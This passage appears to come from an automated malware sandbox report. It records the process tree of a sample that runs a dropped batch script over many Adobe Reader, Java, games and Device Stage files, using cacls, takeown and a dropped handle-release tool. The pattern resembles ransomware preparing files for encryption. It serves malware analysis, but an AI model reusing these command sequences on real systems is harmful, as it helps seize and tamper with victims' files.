  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml""
  2⤵
  - Loads dropped DLL
  PID:1936
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" /E /G Admin:F /C
    3⤵
    PID:2024
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1240
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "resource.xml" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1764
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "resource.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:1364
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2028
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png""
  2⤵
  - Loads dropped DLL
  PID:1492
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png" /E /G Admin:F /C
    3⤵
    PID:796
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:620
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "FreeCellMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1188
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "FreeCellMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:1700
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1696
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png""
  2⤵
  - Loads dropped DLL
  PID:208
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png" /E /G Admin:F /C
    3⤵
    PID:1264
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:836
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "HeartsMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1048
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "HeartsMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:1012
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1944
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini""
  2⤵
  - Loads dropped DLL
  PID:1940
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini" /E /G Admin:F /C
    3⤵
    PID:1428
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini"
    3⤵
    PID:1800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "AGMGPUOptIn.ini" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2024
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "AGMGPUOptIn.ini" -nobanner
      4⤵
      Executes dropped EXE
      PID:1704
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1480
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files\Java\jre7\bin\server\classes.jsa""
  2⤵
  - Loads dropped DLL
  PID:1764
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jre7\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:1936
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jre7\bin\server\classes.jsa"
    3⤵
    - Modifies file permissions
    PID:1864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "classes.jsa" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1716
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:1436
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:612
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf""
  2⤵
  - Loads dropped DLL
  PID:1700
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf" /E /G Admin:F /C
    3⤵
    PID:1572
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf"
    3⤵
    - Modifies file permissions
    PID:1492
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "MyriadCAD.otf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:828
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "MyriadCAD.otf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1264
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:836
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif""
  2⤵
  - Loads dropped DLL
  PID:1012
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif" /E /G Admin:F /C
    3⤵
    PID:1520
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif"
    3⤵
    PID:2012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "create_form.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1932
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "create_form.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:216
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1800
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif""
  2⤵
  - Loads dropped DLL
  PID:1704
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif" /E /G Admin:F /C
    3⤵
    PID:888
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif"
    3⤵
    PID:1468
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "info.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1364
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "info.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1300
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1940
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif""
  2⤵
  PID:1400
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif" /E /G Admin:F /C
    3⤵
    PID:1864
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif"
    3⤵
    PID:1436
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "review_same_reviewers.gif" -nobanner
    3⤵
    PID:1716
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "review_same_reviewers.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:2004
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1728
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif""
  2⤵
  PID:1324
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif" /E /G Admin:F /C
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif"
    3⤵
    PID:1264
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "trash.gif" -nobanner
    3⤵
    PID:828
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "trash.gif" -nobanner
      4⤵
      PID:1984
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1188
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf""
  2⤵
  PID:656
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf" /E /G Admin:F /C
    3⤵
    PID:2012
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf"
    3⤵
    PID:216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "CourierStd-Bold.otf" -nobanner
    3⤵
    PID:1932
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "CourierStd-Bold.otf" -nobanner
      4⤵
      PID:316
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1472
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf""
  2⤵
  PID:1048
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf" /E /G Admin:F /C
    3⤵
    PID:1468
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf"
    3⤵
    PID:1300
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "MyriadPro-It.otf" -nobanner
    3⤵
    PID:1364
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "MyriadPro-It.otf" -nobanner
      4⤵
      PID:1152
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:528
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt""
  2⤵
  PID:2024
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G Admin:F /C
    3⤵
    PID:1436
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"
    3⤵
    - Modifies file permissions
    PID:2004
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner
    3⤵
    PID:1716
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner
      4⤵
      PID:1764
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1076
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp""
  2⤵
  PID:1532
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp" /E /G Admin:F /C
    3⤵
    PID:1264
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp"
    3⤵
    - Modifies file permissions
    PID:1984
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "can.hyp" -nobanner
    3⤵
    PID:828
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "can.hyp" -nobanner
      4⤵
      PID:1700
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1808
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp""
  2⤵
  PID:1328
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp" /E /G Admin:F /C
    3⤵
    PID:216
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp"
    3⤵
    PID:316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "usa37.hyp" -nobanner
    3⤵
    PID:1932
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "usa37.hyp" -nobanner
      4⤵
      PID:1012
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1424
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT""
  2⤵
  PID:208
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT" /E /G Admin:F /C
    3⤵
    PID:1300
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT"
    3⤵
    PID:1152
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "ICELAND.TXT" -nobanner
    3⤵
    PID:1364
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "ICELAND.TXT" -nobanner
      4⤵
      PID:1704
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1548
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT""
  2⤵
  PID:1856
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT" /E /G Admin:F /C
    3⤵
    PID:2004
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT"
    3⤵
    PID:1764
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "CP1254.TXT" -nobanner
    3⤵
    PID:1716
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "CP1254.TXT" -nobanner
      4⤵
      PID:1400
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1576
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""
  2⤵
  PID:1948
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C
    3⤵
    PID:1984
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "overlay.png" -nobanner
    3⤵
    PID:752
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "overlay.png" -nobanner
      4⤵
      PID:1808
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1532
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml""
  2⤵
  PID:1428
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1520
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1944
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:656
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:2012
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1088
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""
  2⤵
  PID:1940
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C
    3⤵
    PID:528
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1364
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1548
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1432
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1244
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml""
  2⤵
  PID:1728
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1076
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1716
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1576
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:620
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:612
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer""
  2⤵
  PID:1572
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer" /E /G Admin:F /C
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer"
    3⤵
    PID:752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "AUMProduct.cer" -nobanner
    3⤵
    PID:212
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "AUMProduct.cer" -nobanner
      4⤵
      PID:1284
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1264
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif""
  2⤵
  PID:1472
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif" /E /G Admin:F /C
    3⤵
    PID:1328
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif"
    3⤵
    PID:1424
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "email_all.gif" -nobanner
    3⤵
    PID:1968
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "email_all.gif" -nobanner
      4⤵
      PID:1088
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1428
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif""
  2⤵
  PID:2044
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif" /E /G Admin:F /C
    3⤵
    PID:1364
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif"
    3⤵
    PID:1432
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "open_original_form.gif" -nobanner
    3⤵
    PID:1548
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "open_original_form.gif" -nobanner
      4⤵
      PID:1280
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2020
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif""
  2⤵
  PID:1300
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif" /E /G Admin:F /C
    3⤵
    PID:796
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif"
    3⤵
    PID:1856
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "rss.gif" -nobanner
    3⤵
    PID:1456
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "rss.gif" -nobanner
      4⤵
      PID:1188
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1764
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif""
  2⤵
  PID:1864
- - C:\Windows\SysWOW64\cacls.exe
